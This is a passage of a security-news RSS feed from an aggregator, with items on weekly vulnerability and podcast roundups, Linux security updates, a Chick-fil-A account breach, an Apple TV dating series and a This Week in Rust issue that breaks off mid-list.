<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/S6-hC85A_qI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In the news this week:<br />
<br />
- InfraTrust and knowing what to patch<br />
- Adversary in the middle triggered command injection<br />
- Exploitarium again<br />
- FreeRDP comes with free vulnerabilities<br />
- AI breaking out of sandboxes on its own<br />
- Wordpress RCE<br />
- DMA dangers<br />
- Nightmware eclypse is at it again<br />
- Fortisandbox<br />
- Turning AI to the dark side<br />
- more prompt injection<br />
- Secure boot is broken, still and again...<br />
<br />
Visit https://www.securityweekly.com/psw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/psw-936<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wordfence Intelligence Weekly WordPress Vulnerability Report (July 13, 2026 to July 19, 2026)]]></title>
<description><![CDATA[Last week, there were disclosed in WordPress Core, and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were that contributed to WordPress Security last week. Review those vulnerabilities in this report now to…
Read more →
The post Wordfence...]]></description>
<link>https://tsecurity.de/de/3690225/it-security-nachrichten/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690225/it-security-nachrichten/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/</guid>
<pubDate>Thu, 23 Jul 2026 23:06:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Last week, there were disclosed in WordPress Core, and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were that contributed to WordPress Security last week. Review those vulnerabilities in this report now to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/">Wordfence Intelligence Weekly WordPress Vulnerability Report (July 13, 2026 to July 19, 2026)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Announces Esther Perel’s New Dating Series ‘The Last Person on Earth’]]></title>
<description><![CDATA[Apple TV is entering the dating genre with The Last Person on Earth, a new documentary series led by relationship expert and bestselling author Esther Perel. The show will test whether two people who seem completely incompatible can develop a meaningful romantic connection.




Episodes: 8



Gen...]]></description>
<link>https://tsecurity.de/de/3689733/ios-mac-os/apple-tv-announces-esther-perels-new-dating-series-the-last-person-on-earth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689733/ios-mac-os/apple-tv-announces-esther-perels-new-dating-series-the-last-person-on-earth/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV is entering the dating genre with The Last Person on Earth, a new documentary series led by relationship expert and bestselling author Esther Perel. The show will test whether two people who seem completely incompatible can develop a meaningful romantic connection.




Episodes: 8



Genre: Dating documentary and relationship series



Release date: Apple TV has not announced a premiere date




Apple announced the eight-episode series on July 23, 2026, but did not share when filming or streaming will begin.



What is The Last Person on Earth about?



The Last Person on Earth will follow five couples brought together by Perel and a team of matchmakers and therapists. Each pairing will include people who initially appear to be opposites and who would probably reject each other based on their usual dating preferences.



The couples will then travel to romantic and remote destinations, where they will spend time together away from their normal routines. The experiment will encourage them to reconsider their ideas about compatibility, attraction, and the qualities they look for in a partner.



The series will examine whether an unexpected match can grow into a lasting relationship. It will also show how personal assumptions, familiar dating patterns, and rigid checklists affect the way people choose potential partners.



FAQs



When will The Last Person on Earth premiere on Apple TV?



Apple TV has not announced an official premiere date. Since the project has only recently been revealed, viewers will need to wait for a trailer and complete release schedule.



How many episodes will The Last Person on Earth have?



The first season will contain eight episodes. Apple has not confirmed whether multiple episodes will arrive together or follow a weekly release schedule.



Is The Last Person on Earth a reality dating show?



Apple describes it as a dating documentary series. However, its format includes matchmaking, romantic trips, relationship experiments, and real participants, placing it close to the reality dating genre.



Who is Esther Perel?



Esther Perel is a psychotherapist, relationship expert, bestselling author, and podcast host known for her work on modern relationships, intimacy, and long-term attraction.



How many couples will appear in the series?



The show will follow five couples who have been matched because they appear to have different personalities, preferences, or expectations.



Where will the couples travel?



Apple has not revealed the exact filming locations. The couples will visit remote destinations described as some of the world’s most romantic settings.



Will there be a trailer?



Apple TV has not released a trailer yet. The first footage will probably arrive closer to the confirmed premiere date.



Apple TV costs $12.99 per month in the United States and includes a seven-day free trial for new subscribers. The service is available through the Apple TV app on Apple devices, smart TVs, streaming players, gaming consoles, and web browsers.



Do you plan to watch The Last Person on Earth when it arrives on Apple TV? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Is Repeating Cloud's Mistakes]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 The rapid adoption of AI shares similarities with the early cloud transition. Organizations moved quickly to adopt new capabilities while still learning how to manage costs, security, and governance.

Moving fast without clear ove...]]></description>
<link>https://tsecurity.de/de/3689342/it-security-video/ai-is-repeating-clouds-mistakes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689342/it-security-video/ai-is-repeating-clouds-mistakes/</guid>
<pubDate>Thu, 23 Jul 2026 16:21:03 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/1jxKP7hcnH4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The rapid adoption of AI shares similarities with the early cloud transition. Organizations moved quickly to adopt new capabilities while still learning how to manage costs, security, and governance.<br />
<br />
Moving fast without clear oversight can create new risks. However, unlike the early cloud era, organizations now have emerging frameworks and standards, including NIST AI RMF, OWASP guidance, and ISO resources, to help structure responsible AI adoption.<br />
<br />
Will organizations use the lessons learned from cloud adoption to build better AI governance, or will they repeat the same challenges?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AIGovernance #CloudSecurity #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (acl, dogtag-pki, dovecot, glibc, go-toolset:rhel8, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd:2.4, javapackages-tools:201801, libtiff, mariadb-connector-c, perl-HTTP-Daemon, pki-deps:10.6, and sssd), Debian (bind9, chromium, fir...]]></description>
<link>https://tsecurity.de/de/3689161/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689161/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 23 Jul 2026 15:18:07 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (acl, dogtag-pki, dovecot, glibc, go-toolset:rhel8, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd:2.4, javapackages-tools:201801, libtiff, mariadb-connector-c, perl-HTTP-Daemon, pki-deps:10.6, and sssd), <b>Debian</b> (bind9, chromium, firefox-esr, and pdns-recursor), <b>Fedora</b> (chromium, collectl, fractal, kernel, libssh, llvm, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, perl-DBI, perl-YAML-Syck, and srt), <b>SUSE</b> (7zip, GraphicsMagick, ImageMagick, multipath-tools, perl-YAML, python-sqlparse, python3-sqlparse, python313-bleach, and sssd), and <b>Ubuntu</b> (apache2, commons-beanutils, exim4, gawk, giflib, gst-plugins-good1.0, krb5, libapache-mod-jk, libarchive, libgphoto2, libhtml-parser-perl, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-ibm, linux-nvidia, linux-fips, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-ibm, linux-oracle, linux-ibm-5.15, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-oem-6.17, linux-oracle-6.8, python-aiohttp, and tar).]]></content:encoded>
</item>
<item>
<title><![CDATA[FOSS Weekly #26.30: Vocalinux, My Computer, Alacritty Terminal, TDF Against Microsoft and More Linux Stuff]]></title>
<description><![CDATA[Torvalds's love-hate relationship with AI continues.]]></description>
<link>https://tsecurity.de/de/3689157/unix-server/foss-weekly-2630-vocalinux-my-computer-alacritty-terminal-tdf-against-microsoft-and-more-linux-stuff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689157/unix-server/foss-weekly-2630-vocalinux-my-computer-alacritty-terminal-tdf-against-microsoft-and-more-linux-stuff/</guid>
<pubDate>Thu, 23 Jul 2026 15:17:29 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Torvalds's love-hate relationship with AI continues.]]></content:encoded>
</item>
<item>
<title><![CDATA[BHIS - Talkin' Bout [infosec] News 2026-07-27]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 0x - Views:0 Join us LIVE on Mondays, 4:30pm EST. 
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.
https://bhisnews.transistor.fm

Chat with us on Disco...]]></description>
<link>https://tsecurity.de/de/3689096/it-security-video/bhis-talkin-bout-infosec-news-2026-07-27/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689096/it-security-video/bhis-talkin-bout-infosec-news-2026-07-27/</guid>
<pubDate>Thu, 23 Jul 2026 14:50:00 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/gIKjJODhcWA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Join us LIVE on Mondays, 4:30pm EST. <br />
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.<br />
https://bhisnews.transistor.fm<br />
<br />
Chat with us on Discord! - <br />
https://discord.gg/bhis<br />
🔴live-chat<br />
<br />
🔗 Register for FREE webcasts, summits, and workshops - <br />
https://poweredbybhis.com<br />
<br />
<br />
Brought to you by:<br />
Black Hills Information Security <br />
https://www.blackhillsinfosec.com<br />
<br />
Antisyphon Training<br />
https://www.antisyphontraining.com/<br />
<br />
Active Countermeasures<br />
https://www.activecountermeasures.com<br />
<br />
Wild West Hackin Fest<br />
https://wildwesthackinfest.com<br />
<br />
<br />
#livestream #infosec #news #BHIS #podcast #Cybersecurity #infosecnews<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chick-fil-A Confirms Customer Data Accessed in Cyberattack]]></title>
<description><![CDATA[Chick-fil-A data security incident may have exposed personal and account information belonging to customers after unauthorized parties launched an automated attack against the company’s website and mobile application. The incident targeted certain Chick-fil-A One accounts between June 17 and June...]]></description>
<link>https://tsecurity.de/de/3688259/it-security-nachrichten/chick-fil-a-confirms-customer-data-accessed-in-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688259/it-security-nachrichten/chick-fil-a-confirms-customer-data-accessed-in-cyberattack/</guid>
<pubDate>Thu, 23 Jul 2026 09:24:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chick-fil-A Data Security" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chick-fil-A-Data-Security-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Chick-fil-A Confirms Customer Data Accessed in Cyberattack 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="270" data-end="647">Chick-fil-A data security incident may have exposed personal and account information belonging to customers after unauthorized parties launched an automated attack against the company’s website and mobile application. The incident targeted certain Chick-fil-A One accounts between June 17 and June 19, 2026, using account credentials obtained from a third-party source.</p>
<p data-start="649" data-end="971">Chick-fil-A said it identified suspicious login activity involving certain Chick-fil-A One accounts and immediately took steps to prevent further unauthorized access. The company launched an investigation and determined on July 13, 2026, that unauthorized parties may have accessed information stored in affected accounts.</p>
<p data-start="973" data-end="1163">The company notified affected customers about the incident and outlined the types of information that may have been involved, along with steps taken to secure accounts and protect customers.</p>

<h3 data-section-id="qabuka" data-start="1165" data-end="1234"><span role="text"><strong data-start="1169" data-end="1234">Chick-fil-A Data Security Incident Linked to Automated Attack</strong></span></h3>
<p data-start="1236" data-end="1531">According to the <a href="https://www.mass.gov/doc/2026-1188-chick-fil-a-inc/download?utm_source=tugatech.com.pt" target="_blank" rel="nofollow noopener">notice sent to customers</a>, the Chick-fil-A data security incident involved an automated attack against the company's website and mobile application. The attackers used account credentials, including email addresses and <a href="https://thecyberexpress.com/steps-to-create-unbreakable-passwords/" target="_blank" rel="noopener">passwords</a>, that were obtained from a third-party source.</p>
<p data-start="1533" data-end="1754">The activity took place over a three-day period between June 17 and June 19. After identifying suspicious login activity, Chick-fil-A moved to prevent additional unauthorized activity and began investigating the incident.</p>
<p data-start="1756" data-end="1903">The company said its investigation later determined that unauthorized parties may have accessed information in customers' Chick-fil-A One accounts.</p>

<h3 data-section-id="1h8k3wz" data-start="1905" data-end="1975"><span role="text"><strong data-start="1909" data-end="1975">Chick-fil-A One Accounts May Have Exposed Personal Information</strong></span></h3>
<p data-start="1977" data-end="2094">The information potentially accessed in the incident varied depending on what customers had stored in their accounts.</p>
<p data-start="2096" data-end="2434">Potentially affected <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29091">data</a> may have included customers' names, email addresses, Chick-fil-A One membership numbers and mobile pay numbers. The information may also have included <a href="https://thecyberexpress.com/free-wifi-qr-code-risk-experiment/" target="_blank" rel="noopener">QR codes</a>, the last four digits of credit or debit card numbers, and the amount of Chick-fil-A credit, such as an e-gift card balance, associated with an account.</p>
<p data-start="2436" data-end="2620">For customers who had additional information saved to their accounts, the potentially exposed data may also have included the month and day of their birthday, phone number and address.</p>
<p data-start="2622" data-end="2717">The company did not state that all listed information was accessed for every affected customer.</p>

<h3 data-section-id="11jyvqk" data-start="2719" data-end="2783"><span role="text"><strong data-start="2723" data-end="2783">Chick-fil-A Resets Passwords and Removes Payment Methods</strong></span></h3>
<p data-start="2785" data-end="2979">Following the incident, Chick-fil-A said it took immediate action to protect affected accounts. The measures included forcing log-outs from impacted accounts and removing stored payment methods.</p>
<p data-start="2981" data-end="3159">The company also restored the balances of impacted Chick-fil-A One accounts. As an additional measure for affected customers, Chick-fil-A said it added rewards to their accounts.</p>
<p data-start="3161" data-end="3300">The company said it continues to enhance its <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29090">security</a>, monitoring and fraud controls to reduce the risk of similar incidents in the future.</p>

<h3 data-section-id="ebuey1" data-start="3302" data-end="3357"><span role="text"><strong data-start="3306" data-end="3357">Chick-fil-A Urges Customers to Update Passwords</strong></span></h3>
<p data-start="3359" data-end="3503">Chick-fil-A said it has <a href="https://thecyberexpress.com/tce-weekly-roundup-five-eyes-ai-kddi-tfl/" target="_blank" rel="noopener">reset the passwords</a> associated with affected accounts and urged customers to update their passwords as soon as possible.</p>
<p data-start="3505" data-end="3690">The company recommended that customers choose strong, difficult-to-guess passwords that are unique to their Chick-fil-A accounts and not reused across other websites or online services.</p>
<p data-start="3692" data-end="3934">The company also encouraged customers to remain vigilant against potential identity theft and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29092">fraud</a>. Customers were advised to review their credit reports and account statements carefully and check for any activity that they do not recognize.</p>
<p data-start="3936" data-end="4288" data-is-last-node="" data-is-only-node="">The Chick-fil-A data security incident highlights the risks associated with compromised account credentials being used in automated attacks. While the company said it took steps to secure affected accounts and restore balances, customers are being encouraged to take additional precautions to protect their personal information and online accounts.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 661]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</guid>
<pubDate>Thu, 23 Jul 2026 07:18:12 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/16/Rust-1.97.1/">Announcing Rust 1.97.1</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-76">The Embedded Rustacean Issue #76</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://tokio.rs/blog/2026-07-22-announcing-topcoat">Announcing Topcoat: a framework for building full-stack reactive web apps with Rust</a></li>
<li><a href="https://github.com/dtolnay/syn/releases/tag/3.0.0">Syn 3.0.0</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/07/22/whats-new-in-rustrover-2026-2/">What’s New in RustRover 2026.2</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.35.0">kobe 0.35.0: readiness gates and cert recycling</a></li>
<li><a href="https://github.com/Eoin-McMahon/comhad/releases/tag/v0.1.0">Comhad v0.1.0: a ranger-style tui cyberduck replacement for browsing S3</a></li>
<li><a href="https://github.com/bigduu/Nova/releases/tag/v0.2.1">Nova v0.2.1: computer-use MCP server</a></li>
<li><a href="https://github.com/rust-windowing/winit/pull/4571">winit now has comprehensive cross-platform drag-and-drop support, exposing most of the power of the underlying OS APIs</a></li>
<li><a href="https://github.com/singhpratech/crimson-crab/releases/tag/v0.1.0">crimson-crab v0.1.0 - a production-grade Rust SDK for the Claude API (streaming, tool use, prompt caching, batches)</a></li>
<li><a href="https://singhpratech.github.io/ferrovec/">ferrovec: dependency-light HNSW vector search in Rust, compiled to WebAssembly for private in-browser semantic search</a></li>
<li><a href="https://github.com/ordokr/ordofp/releases/tag/v0.1.0">OrdoFP 0.1.0 released — a functional-programming toolbelt for Rust (HList, GAT type classes, optics, effects, monad transformers)</a></li>
<li><a href="https://freyaui.dev/posts/0.4">Freya 0.4</a></li>
<li><a href="https://dev.to/nabsei/buildline-merging-cargo-and-ninjas-build-profiling-into-one-timeline-2373">buildline: merging cargo and ninja's build profiling into one timeline</a></li>
<li><a href="https://richer-richard.github.io/cochlea/determinism.html#030-additions-2026-07-22">cochlea 0.3.0: melody read-back, MFCC timbre, a master limiter, and MIDI import for the deterministic agent-audio engine</a></li>
<li><a href="https://flodl.dev/blog/then-the-cpu-died">flodl 0.6.0: multi-host heterogeneous DDP - mismatched GPUs across hosts beat the fastest card alone</a></li>
<li><a href="https://hongnoul.github.io/hwatu/">hwatu: a daemon-based WebKitGTK browser for tiling WMs with ~13ms window spawn</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.11.0">kache 0.11.0: broader compiler coverage and libc-aware keys</a></li>
<li><a href="https://mladedav.github.io/blog/blog/tracing-reload/"><code>tracing-reload</code> - reload layer without panics</a></li>
<li><a href="https://www.opentypeless.com/en/blog/introducing-talkmore">Introducing OpenTypeless: Voice Input That Actually Works</a></li>
<li><a href="https://dev.to/booyaka101/reading-a-rust-crates-capabilities-out-of-its-compiled-symbols-58pb">Reading a Rust crate's capabilities out of its compiled symbols</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://smallcultfollowing.com/babysteps/blog/2026/07/15/battery-packs/">Battery packs: Let's talk about crates, baby</a></li>
<li><a href="https://blog.yoshuawuyts.com/capture-clauses-as-effects">Capture Clauses as Effects</a></li>
<li><a href="https://corrode.dev/blog/hardening-rust/">Hardening Rust Code For Production</a></li>
<li><a href="https://pranitha.dev/posts/tokio-gives-progress-not-ordering/">Tokio Gives Progress, Not Ordering: Scheduling 1M Tasks</a></li>
<li><a href="https://kerkour.com/rust-service-hardening-and-production-checklist">Rust service hardening and production checklist</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e08-rust-foundation/">The Rust Foundation with Rebecca Rumbul, Lori Lorusso, and David Wood, Rust Foundation leadership and board</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=bAINppA0BSU">Jon Gjengset: Open Source Maintenance 2026-07-18</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=lUoQ3uGSQA0">Rust Release Changelog - 1.97.0</a></li>
<li>[video] <a href="https://www.youtube.com/live/Doqwh1b4QyA">Livestream: Rust in Ubuntu</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://kriyanative.com/blog/13-chain-breaks/">I hash-chained my agent's audit log. Then I found 13 breaks in it — all mine, all benign.</a></li>
<li><a href="https://dev.to/scripthpp/two-bugs-i-only-found-by-running-my-rust-sync-daemon-against-real-infrastructure-4278">Two tricky bugs in a Rust daemon</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=u91eX3J6lPU">Backend Concepts in Rust: Securely Managing App Secrets</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=tIrSvJFRxAg">Build with Naz - Ep 21: High Performance Flat 2D Arrays in Rust (SIMD, L1 cache)</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/medialab/xan">xan</a>, a TUI toolkit to work with CSV files.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1630">Simeon H.K. Fitch</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><em>No Calls for participation were submitted this week.</em></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>


<ul>
<li><em>No Calls for papers or presentations were submitted this week.</em></li>
</ul>
<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>576 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-14..2026-07-21">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159256">account for async closures when pointing at lifetime in return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157824">comptime inherent impls</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159115"><code>dep_graph</code>: deduplicate task reads with an epoch-filtered index recorder</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158976">eagerly check for ambiguity in macro parsing</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158608">implement <code>#[diagnostic::opaque]</code> attribute to hide backtraces of macros</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158720">shrink <code>ast::Expr64</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159467">add explicit <code>Iterator::count</code> impl for <code>str::EncodeUtf16</code></a></li>
